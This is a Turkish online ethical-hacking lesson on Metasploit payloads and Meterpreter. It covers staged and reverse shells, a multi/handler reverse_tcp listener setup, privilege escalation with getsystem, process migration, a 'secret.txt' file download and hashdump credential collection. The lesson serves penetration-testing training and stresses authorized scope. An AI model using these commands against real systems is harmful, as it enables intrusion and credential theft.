0Pricing
Ethical Hacking Academy · Ders

Yükler ve Meterpreter

İstismar sonrası kabuk

Yükler ve Meterpreter, CoddyKit'te ücretsiz bir Ethical Hacking Academy dersidir. Bu, 4 dersinin 3. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Ethical Hacking Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.

Yük Nedir?

Bir yük, bir istismar başarılı olduktan sonra hedefte yürütülen koddur. Tek bir komut çalıştırmaktan tam etkileşimli bir kabuk açmaya kadar bundan sonra neler yapabileceğinizi belirler.

Doğru yükü seçmek hedef işletim sistemine, ağ kurulumuna ve ne kadar erişime ihtiyaç duyduğunuza bağlıdır.

Aşamalı ve Aşamasız

Yüklerin iki teslim biçimi vardır:

  • Aşamalı (meterpreter/reverse_tcp içindeki / işaretine dikkat edin): önce küçük bir başlangıç kodu gönderir, ardından tam yükü indirir. Başlangıçtaki iz daha küçüktür.
  • Aşamasız (meterpreter_reverse_tcp içindeki _ işaretine dikkat edin): yükün tamamı tek seferde gönderilir. Kararsız ağlarda daha güvenilirdir.

Bağlanan ve Ters Kabuğa Sahip Kabuqlar

İki bağlantı yönü vardır:

  • Bağlanan kabuk: hedef bir bağlantı noktası açıp bekler; siz ona bağlanırsınız. Güvenlik duvarları tarafından çoğunlukla engellenir.
  • Ters kabuk: hedef size geri bağlanır (LHOST/LPORT). Bu, dışarı yönlü bağlantılara izin veren güvenlik duvarlarını genellikle aşar.

Bu nedenle ters yükler yaygın varsayılan seçenektir.

Meterpreter ile Tanışın

Meterpreter, Metasploit'in gelişmiş yüküdür. Temel bir komut kabuğunun aksine bellekte çalışır, şifrelenmiş bir kanal üzerinden iletişim kurar ve istismar sonrası işlemler için zengin bir komut kümesi sunar.

Diske yazma işlemini önlediği için ayrı bir çalıştırılabilir dosya bırakmaktan daha gizlidir.

Temel Meterpreter Komutları

Bir Meterpreter oturumunuz olduğunda temel komutlar hedefi tanımanıza yardımcı olur.

sysinfo      # OS, architecture, hostname
getuid       # current user context
ps           # running processes
pwd  ls  cd  # filesystem navigation

Dosya Aktarımı

Meterpreter, yetkili testlerde kanıt toplamak veya araçları hazırlamak için yararlı olan basit komutlarla makineniz ve hedef arasında dosyaları taşır.

download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\

Sistem Kabuğuna Geçme

shell komutu, doğrudan işletim sistemi düzeyinde komutlara ihtiyaç duyduğunuzda sizi Meterpreter'dan hedefin yerel komut yorumlayıcısına (cmd.exe veya /bin/sh) geçirir.

Oturumu kaybetmeden Meterpreter istemine dönmek için exit yazın.

shell
# C:\> whoami
# exit  -> back to meterpreter

Yetki Yükseltme

Çoğu zaman sınırlı yetkilerle erişim elde edersiniz. Meterpreter yetki yükseltmenize yardımcı olur:

  • getsystem, Windows'ta SYSTEM elde etmek için bilinen teknikleri dener.
  • local_exploit_suggester sonradan çalıştırma modülü, makine için yerel yetki yükseltme istismarları önerir.

Daha yüksek yetkiler, kimlik bilgilerini dökmeyi ve daha derin erişimi mümkün kılar.

getsystem
run post/multi/recon/local_exploit_suggester

Süreçleri Taşıma

Oturumunuz bir süreç içinde çalışır. Bu süreç kararsızsa veya sonlandırılma ihtimali varsa oturumunuzu korumak için migrate komutuyla daha kararlı ve uzun süre çalışan bir sürece geçin.

Yetki düzeyinizle eşleşen bir sürece geçmek ortama uyum sağlamanıza da yardımcı olur ve kullanıcı bağlamınızı değiştirebilir.

ps
migrate 1340     # migrate into a stable PID

Erişimi Sürdürme

Meterpreter, yetkili değerlendirmeler sırasında yararlı verileri toplamak için hashdump ile parola karmalarını toplama ve tuş tarama araçlarıyla girdi yakalamanın etkisini gösterme gibi özellikler içerir.

Bu tür yetenekleri yalnızca üzerinde anlaşılmış kapsam içinde kullanın ve her şeyi müşteri raporu için belgeleyin.

hashdump
run post/windows/gather/checkvm

İşleyiciler

Bir ters yükün bağlantıyı yakalamak için sizin tarafınızda dinleyen bir bileşene ihtiyacı vardır. multi/handler modülü bu yakalayıcıdır. Bu modülü, yükü oluşturmak için kullanılan aynı yük, LHOST ve LPORT ile yapılandırın.

Bu, bir msfvenom yükünü konsol dışında teslim ettiğinizde zorunludur: önce işleyiciyi başlatın, ardından hedefteki yükü tetikleyin.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -j

Hızlı Kontrol

Kısıtlayıcı bir güvenlik duvarını aşan yükü seçin.

Özet

Yükleri ve Meterpreter'ı öğrendiniz:

  • Yükler aşamalı (/) veya aşamasız (_), ayrıca bağlanan veya ters olabilir; ters yükler genellikle güvenlik duvarlarını aşar.
  • Meterpreter, zengin komutlarla şifrelenmiş bir kanal üzerinden bellekte çalışır.
  • Temel görevler: sysinfo, getuid, ps, download/upload, shell.
  • getsystem ve local_exploit_suggester ile yetki yükseltin; kararlılık için migrate kullanın.
  • Toplama özelliklerini yalnızca kapsam içinde kullanın ve her şeyi belgeleyin.

Sırada: istismar sonrası modüller, pivot işlemleri ve ganimet toplama.

Sıkça Sorulan Sorular

“Yükler ve Meterpreter” dersi ücretsiz mi?

Evet — “Yükler ve Meterpreter” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Ethical Hacking Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.

“Yükler ve Meterpreter” dersinde ne öğreneceğim?

İstismar sonrası kabuk Ethical Hacking Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Ethical Hacking Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Ethical Hacking Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 3. dersidir.

“Yükler ve Meterpreter” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Ethical Hacking Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Ethical Hacking Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Metasploit Mimarisi
  2. İstismarları Arama ve Kullanma
  3. Yükler ve Meterpreter
  4. İstismar Sonrası Modüller
← Ethical Hacking Academy Sayfasına Dön